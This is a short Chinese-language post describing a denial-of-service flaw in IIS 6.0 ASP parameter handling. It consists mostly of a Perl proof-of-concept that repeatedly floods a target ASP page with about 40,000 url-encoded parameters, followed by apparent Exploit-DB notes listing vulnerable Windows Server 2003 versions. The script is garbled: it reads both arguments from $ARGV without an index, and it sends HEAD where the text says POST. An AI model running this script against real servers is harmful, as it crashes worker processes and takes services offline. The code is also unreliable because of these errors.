微软IIS 6.0 ASP堆栈溢出 拒绝服务漏洞
攻击者发送一个POST请求到ASP页,在POST请求中包含大于 40000请求参数,并在发送时用x-www-form-urlencoded编码 。攻击者利用此漏洞可导致IIS辅助进程崩溃,造成导致默认应用程序池被禁用拒绝服务。
PoC Exploit :
01.# IIS 6.0 ASP DoS PoC
02.# usage: perl IISdos.pl <host> <asp page>
03.use IO::Socket;
04.$|=1;
05.$host = $ARGV;
06.$script = $ARGV;
07.while(1) {
08.$sock = IO::Socket::INET->new(PeerAddr => $host,
09. PeerPort => 'http(80)',
10. Proto => 'tcp');
11.$write = "C=A&" x 40000;
12.print $sock "HEAD /$script HTTP/1.1\r\nHost: $host\r\n"
13. ."Connection:Close\r\nContent-Type: application/x-www-form-urlencoded\r\n"
14. ."Content-Length:". length($write) ."\r\n\r\n" . $write;
15.print ".";
16.while(<$sock>) {
17. print;
18.}
19.}
20.
21.
22.EDB Notes:
23.In our tests, a specific setting has to be modified in metabase.xml in order to trigger the exhaustion. Tested systems that are vulnerable: Windows Server 2003 Standard SP2, Windows Server 2003 Standard
页:
[1]